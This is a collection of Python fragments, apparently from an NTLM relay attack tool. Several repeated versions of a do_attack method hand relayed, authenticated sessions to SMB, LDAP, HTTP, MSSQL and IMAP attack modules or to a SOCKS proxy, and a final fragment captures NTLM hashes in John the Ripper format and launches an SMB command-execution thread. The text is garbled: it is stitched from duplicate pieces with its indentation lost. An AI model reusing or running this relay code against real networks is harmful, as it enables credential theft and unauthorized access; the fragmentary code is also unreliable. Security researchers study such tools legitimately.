def do_attack(self, client, connData=None):
#Do attack. Note that unlike the HTTP server, the config entries are stored in the current object and not in any of its properties
if self.target[0] == 'SMB':
if self.config.runSocks is True:
# For now, we only support SOCKS for SMB, for now.
# Pass all the data to the socksplugins proxy
activeConnections.put(
(self.target[1], 445, self.authUser, client, connData))
logging.info(
"Adding %s(445) to active SOCKS connection. Enjoy" %
self.target[1])
else:
clientThread = self.config.attacks['SMB'](self.config, client,
self.authUser)
clientThread.start()
if self.target[0] == 'LDAP' or self.target[0] == 'LDAPS':
clientThread = self.config.attacks['LDAP'](self.config, client,
self.authUser)
clientThread.start()
if self.target[0] == 'HTTP' or self.target[0] == 'HTTPS':
clientThread = self.config.attacks['HTTP'](self.config, client,
self.authUser)
clientThread.start()
if self.target[0] == 'MSSQL':
clientThread = self.config.attacks['MSSQL'](self.config, client)
clientThread.start()
if self.target[0] == 'IMAP' or self.target[0] == 'IMAPS':
clientThread = self.config.attacks['IMAP'](self.config, client,
self.authUser)
clientThread.start()
def do_attack(self):
# Check if SOCKS is enabled and if we support the target scheme
if self.server.config.runSocks and self.target.scheme.upper() in self.server.config.socksServer.supportedSchemes:
# Pass all the data to the socksplugins proxy
activeConnections.put((self.target.hostname, self.client.targetPort, self.authUser, self.client, self.client.sessionData))
return
# If SOCKS is not enabled, or not supported for this scheme, fall back to "classic" attacks
if self.target.scheme.upper() in self.server.config.attacks:
# We have an attack.. go for it
clientThread = self.server.config.attacks[self.target.scheme.upper()](self.server.config, self.client.session,
self.authUser)
clientThread.start()
else:
LOG.error('No attack configured for %s' % self.target.scheme.upper())
def do_attack(self):
# Check if SOCKS is enabled and if we support the target scheme
if self.server.config.runSocks and self.target.scheme.upper() in self.server.config.socksServer.supportedSchemes:
# Pass all the data to the socksplugins proxy
activeConnections.put((self.target.hostname, self.client.targetPort, self.authUser, self.client, self.client.sessionData))
return
# If SOCKS is not enabled, or not supported for this scheme, fall back to "classic" attacks
if self.target.scheme.upper() in self.server.config.attacks:
# We have an attack.. go for it
clientThread = self.server.config.attacks[self.target.scheme.upper()](self.server.config, self.client.session,
self.authUser)
clientThread.start()
else:
LOG.error('No attack configured for %s' % self.target.scheme.upper())
def do_attack(self,client):
#Do attack. Note that unlike the HTTP server, the config entries are stored in the current object and not in any of its properties
# Check if SOCKS is enabled and if we support the target scheme
if self.config.runSocks and self.target.scheme.upper() in self.config.socksServer.supportedSchemes:
if self.config.runSocks is True:
# Pass all the data to the socksplugins proxy
activeConnections.put((self.target.hostname, client.targetPort, self.target.scheme.upper(),
self.authUser, client, client.sessionData))
return
# If SOCKS is not enabled, or not supported for this scheme, fall back to "classic" attacks
if self.target.scheme.upper() in self.config.attacks:
# We have an attack.. go for it
clientThread = self.config.attacks[self.target.scheme.upper()](self.config, client.session, self.authUser)
clientThread.start()
else:
LOG.error('No attack configured for %s' % self.target.scheme.upper())
def do_attack(self,client):
#Do attack. Note that unlike the HTTP server, the config entries are stored in the current object and not in any of its properties
# Check if SOCKS is enabled and if we support the target scheme
if self.config.runSocks and self.target.scheme.upper() in self.config.socksServer.supportedSchemes:
if self.config.runSocks is True:
# Pass all the data to the socksplugins proxy
activeConnections.put((self.target.hostname, client.targetPort, self.target.scheme.upper(),
self.authUser, client, client.sessionData))
return
# If SOCKS is not enabled, or not supported for this scheme, fall back to "classic" attacks
if self.target.scheme.upper() in self.config.attacks:
# We have an attack.. go for it
clientThread = self.config.attacks[self.target.scheme.upper()](self.config, client.session, self.authUser)
clientThread.start()
else:
LOG.error('No attack configured for %s' % self.target.scheme.upper())
smbClient.setUid(0)
#Log this target as processed for this client
self.targetprocessor.log_target(connData['ClientIP'],self.target)
return None, [packet], errorCode
# Now continue with the server
else:
# We have a session, create a thread and do whatever we want
ntlm_hash_data = outputToJohnFormat( '', sessionSetupData['Account'], sessionSetupData['PrimaryDomain'], sessionSetupData['AnsiPwd'], sessionSetupData['UnicodePwd'] )
logging.info(ntlm_hash_data['hash_string'])
if self.server.getJTRdumpPath() != '':
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'], self.server.getJTRdumpPath())
if self.config.runSocks is True and self.target[0] == 'SMB':
# For now, we only support SOCKS for SMB, for now.
# Pass all the data to the socksplugins proxy
activeConnections.put((self.target[1], 445, sessionSetupData['Account'], smbClient, connData))
logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target[1])
else:
#TODO: Fix this for other protocols than SMB [!]
clientThread = self.config.attacks['SMB'](self.config,smbClient,self.config.exeFile,self.config.command)
clientThread.start()
#Log this target as processed for this client
self.targetprocessor.log_target(connData['ClientIP'],self.target)
# Remove the target server from our connection list, the work is done
del (smbData[self.target])
# Now continue with the server
#############################################################